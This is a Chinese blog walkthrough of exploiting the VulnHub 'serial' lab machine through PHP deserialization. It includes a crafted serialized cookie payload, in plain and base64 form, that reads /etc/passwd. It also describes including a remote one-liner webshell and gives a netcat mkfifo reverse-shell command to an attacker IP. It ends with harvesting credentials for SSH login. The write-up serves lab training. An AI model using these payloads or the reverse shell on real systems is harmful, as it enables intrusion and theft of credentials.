php反序列化靶机serial实战

靶机信息
https://www.vulnhub.com/entry/serial-1,349/

下载好之后,使用Vmware新建一个虚拟机打开

1.线创建新的虚拟机

2.选择客户机版本为Ubuntu 64位。

3.选择使用现有磁盘,选择下载的vmdk磁盘文件即可

4.打开虚拟机,环境就配置好了

打开靶机,在kali虚拟机进行主机存活探测

可以知道靶机IP地址为192.168.133.171

扫描端口发现有一个22端口和80端口

接下来用kali扫描他的目录

发现有一个可以访问的目录,悄悄访问一下

然后backup目录下有一个bak.zip下载下来

下载之后有三个文件 分析一下

index.php

log.class.php

user.class.php

提示cookie,抓包看一下

cookie那儿有一串base64加密的 解密一下

base64解码得到序列化后的字段

O:4:"User":2:{s:10:"Username";s:3:"sk4";s:9:"Userwel";O:7:"Welcome":0:{}}

然后构造payload读取/etc/passwd文件

O:4:"User":2:{s:10:"\x00User\x00name";s:5:"admin";s:9:"\x00User\x00wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}}')

然后base64编码一下

Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjM6InNrNCI7czo5OiIAVXNlcgB3ZWwiO086MzoiTG9nIjoxOntzOjg6InR5cGVfbG9nIjtzOjExOiIvZXRjL3Bhc3N3ZCI7fX0=

在抓一次包 打开用burp的repeater

构造序列化语句上传shell

生成一个shell放在本地网站下

然后构造payload,尝试读取passwd文件,payload如下 新创建一个1.php在本地的www下 然后 把type_log参数后面记得改成自己上传到本地的一句话木马

然后访问自己创建的php

然后抓包 访问得到的编码 替换cookie

成功执行

反弹shell

rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f|/bin/sh+-i+2>&1|nc+1192.168.133.163+6666+>/tmp/f

将上面url编码后填入参数位置

在kali开启监听 监听成功

查看文件,多来几次返回上级目录,找到txt文件

查看文件得到他的账号跟密码

最后远程接入 成功进入

  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值